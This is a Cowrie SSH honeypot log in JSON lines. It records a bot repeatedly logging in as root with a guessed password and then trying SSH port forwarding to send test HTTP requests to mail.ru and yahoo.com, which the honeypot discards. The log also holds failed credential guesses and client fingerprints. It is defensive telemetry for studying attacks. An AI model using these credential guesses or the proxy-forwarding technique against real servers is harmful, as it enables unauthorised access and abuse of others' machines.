{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.688870Z","src_ip":"212.227.235.229","session":"1c05616b5148"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.751872Z","src_ip":"77.83.207.83","session":"bc3c4a6b557b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8926,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8926","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.804847Z","session":"bc3c4a6b557b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:43.856736Z","src_ip":"77.83.207.83","session":"bc3c4a6b557b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31886,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31886","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.002298Z","session":"bc3c4a6b557b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.054194Z","src_ip":"77.83.207.83","session":"bc3c4a6b557b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":28539,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28539","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.198498Z","session":"bc3c4a6b557b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.250834Z","src_ip":"77.83.207.83","session":"bc3c4a6b557b"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.266488Z","src_ip":"212.227.235.229","session":"79055abbc367"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.303730Z","src_ip":"77.83.207.83","session":"bc3c4a6b557b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45445,"dst_ip":"1.2.3.4","dst_port":22,"session":"1715780fa000","protocol":"ssh","message":"New connection: 77.83.207.83:45445 (1.2.3.4:22) [session: 1715780fa000]","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.352493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.353141Z","src_ip":"77.83.207.83","session":"1715780fa000"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.403048Z","src_ip":"77.83.207.83","session":"1715780fa000"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.651099Z","src_ip":"77.83.207.83","session":"1715780fa000"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.688479Z","src_ip":"212.227.235.229","session":"41c11ad8db47"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8229,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:8229","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.701496Z","session":"1715780fa000"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.751272Z","src_ip":"77.83.207.83","session":"1715780fa000"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":3953,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:3953","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.892112Z","session":"1715780fa000"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:44.941974Z","src_ip":"77.83.207.83","session":"1715780fa000"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":24966,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24966","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.084090Z","session":"1715780fa000"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.133836Z","src_ip":"77.83.207.83","session":"1715780fa000"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.184509Z","src_ip":"77.83.207.83","session":"1715780fa000"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45528,"dst_ip":"1.2.3.4","dst_port":22,"session":"69855900e2a5","protocol":"ssh","message":"New connection: 77.83.207.83:45528 (1.2.3.4:22) [session: 69855900e2a5]","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.235376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.236279Z","src_ip":"77.83.207.83","session":"69855900e2a5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.287529Z","src_ip":"77.83.207.83","session":"69855900e2a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.543441Z","src_ip":"77.83.207.83","session":"69855900e2a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30840,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:30840","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.595692Z","session":"69855900e2a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.646974Z","src_ip":"77.83.207.83","session":"69855900e2a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":26955,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:26955","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.789641Z","session":"69855900e2a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.841776Z","src_ip":"77.83.207.83","session":"69855900e2a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":17945,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:17945","sensor":"my-vps","timestamp":"2025-08-31T03:53:45.985631Z","session":"69855900e2a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.037082Z","src_ip":"77.83.207.83","session":"69855900e2a5"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.089552Z","src_ip":"77.83.207.83","session":"69855900e2a5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45611,"dst_ip":"1.2.3.4","dst_port":22,"session":"17dacbdf1252","protocol":"ssh","message":"New connection: 77.83.207.83:45611 (1.2.3.4:22) [session: 17dacbdf1252]","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.137905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.148052Z","src_ip":"77.83.207.83","session":"17dacbdf1252"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.187707Z","src_ip":"77.83.207.83","session":"17dacbdf1252"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.436759Z","src_ip":"77.83.207.83","session":"17dacbdf1252"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20063,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:20063","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.487381Z","session":"17dacbdf1252"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.537213Z","src_ip":"77.83.207.83","session":"17dacbdf1252"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":24255,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:24255","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.680389Z","session":"17dacbdf1252"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.730142Z","src_ip":"77.83.207.83","session":"17dacbdf1252"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":949,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:949","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.872210Z","session":"17dacbdf1252"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.922092Z","src_ip":"77.83.207.83","session":"17dacbdf1252"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:46.972842Z","src_ip":"77.83.207.83","session":"17dacbdf1252"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45709,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3fcd8f15239","protocol":"ssh","message":"New connection: 77.83.207.83:45709 (1.2.3.4:22) [session: c3fcd8f15239]","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.022374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.023287Z","src_ip":"77.83.207.83","session":"c3fcd8f15239"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.073796Z","src_ip":"77.83.207.83","session":"c3fcd8f15239"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.325733Z","src_ip":"77.83.207.83","session":"c3fcd8f15239"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":28433,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:28433","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.377019Z","session":"c3fcd8f15239"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.427885Z","src_ip":"77.83.207.83","session":"c3fcd8f15239"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":20026,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20026","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.568931Z","session":"c3fcd8f15239"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.619510Z","src_ip":"77.83.207.83","session":"c3fcd8f15239"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":12159,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:12159","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.760983Z","session":"c3fcd8f15239"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:47.811580Z","src_ip":"77.83.207.83","session":"c3fcd8f15239"}
